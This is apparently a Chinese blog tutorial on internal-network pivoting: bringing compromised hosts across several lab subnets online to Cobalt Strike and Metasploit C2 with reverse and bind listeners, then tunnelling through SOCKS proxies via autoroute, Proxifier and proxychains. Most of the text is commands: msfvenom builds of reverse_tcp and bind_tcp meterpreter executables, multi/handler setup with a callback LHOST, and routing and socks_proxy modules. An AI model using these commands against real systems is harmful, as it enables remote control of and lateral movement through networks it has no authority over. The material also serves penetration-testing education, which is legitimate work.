内网对抗-代理通讯篇&不出网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案

知识点

1、代理隧道篇-代理通讯网络不可达-正反向连接上线

2、代理隧道篇-代理通讯网络不可达-SockS代理配置

实现步骤

bash 复制代码
1、在被控机器上获取下一级网段
2、在被控及其上建立SockS节点
3、在工具上配置连接属性和规则触发

演示案例-代理技术-正反向监听/SockS配置-网络不可达-通讯解决/c2上线

bash 复制代码
解决:信息收集打点和漏洞利用部分
C2平台:MSF/CS/Sliver/Viper等


1、CS

192.168.139.x 网段反向上线




socks代理链接工具-Proxifier(windows)

bash 复制代码
注意:配置连接IP为C2服务器IP
C2服务器是一个远程服务器,‌用于管理和控制受感染的计算机或设备。‌C2服务器通常被用于网络攻击活动中,‌攻击者通过C2服务器发送命令,‌控制受感染的设备进行恶意行为




这里假设这个2.22的服务器存在漏洞能直接上线C2服务器,就会涉及一个C2正反向上线问题。

192.168.2.x 网段正向上线

bash 复制代码
反向监听器:reverse
正向监听器:bind(需主动连接)







192.168.3.x 网段正向上线






继续正向上线这个3.22服务器

192.168.4.x 网段正向上线

同理

2、MSF

192.168.139.x 网段反向上线

配置反向上线:

bash 复制代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.128 LPORT=3333 -f exe -o msf.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

查看路由表

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p

background 返回不结束会话

创建socks节点

bash 复制代码
use auxiliary/server/socks_proxy


socks代理链接工具-proxychains(linux)

加入修改配置:

bash 复制代码
/etc/proxychains4.conf


调用加载测试:

bash 复制代码
 proxychains4 curl http://192.168.2.22

192.168.2.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run



查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
/etc/proxychains4.conf


192.168.3.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run


查看路由表:

bash 复制代码
run post/multi/manage/autoroute
run autoroute -p
background 

创建socks节点:

bash 复制代码
use auxiliary/server/socks_proxy


加入修改配置:

bash 复制代码
 /etc/proxychains4.conf


192.168.4.x 网段正向上线

配置正向上线:

bash 复制代码
msfvenom -p windows/meterpreter/bind_tcp LPORT=xx -f exe -o msf.exe
use exploit/multi/handler

set payload windows/meterpreter/bind_tcp
set rhost xx.xx.xx.xx
set lport 6666
run
相关推荐
evan_gyy12 小时前
【VSCode】解决:提取扩展失败,XHR Failed
vscode·代理·扩展
衣舞晨风16 小时前
内网IP段介绍与汇总
网络·tcp/ip·ipv4·内网·网段
SunnyRivers10 天前
爬虫基础之代理的基本原理
爬虫·代理
Ztiddler11 天前
【CMD、PowerShell和Bash设置代理】
开发语言·深度学习·github·bash·powershell·代理·cmd
hgdlip15 天前
什么是内网什么是外网?区别是什么
网络·智能路由器·外网·内网
YRr YRr24 天前
系统代理与Tun模式的工作原理和应用场景详解
代理·tun
云川之下1 个月前
【go】查询某个依赖是否存在于这个代理
golang·代理
风柏杨1 个月前
巧用防火墙的转发功能在云服务器上搭建代理解决Redis,数据库等资源需IP白名单访问的问题
服务器·数据库·tcp/ip·代理·云数据库白名单处理
test12802 个月前
局域网 docker pull 使用代理拉取镜像
docker·容器·代理·docker pull·http_proxy
xiangshangdemayi2 个月前
vue3环境下mapbox本地部署极速入门
部署·矢量切片·mapbox·内网·离线·天地图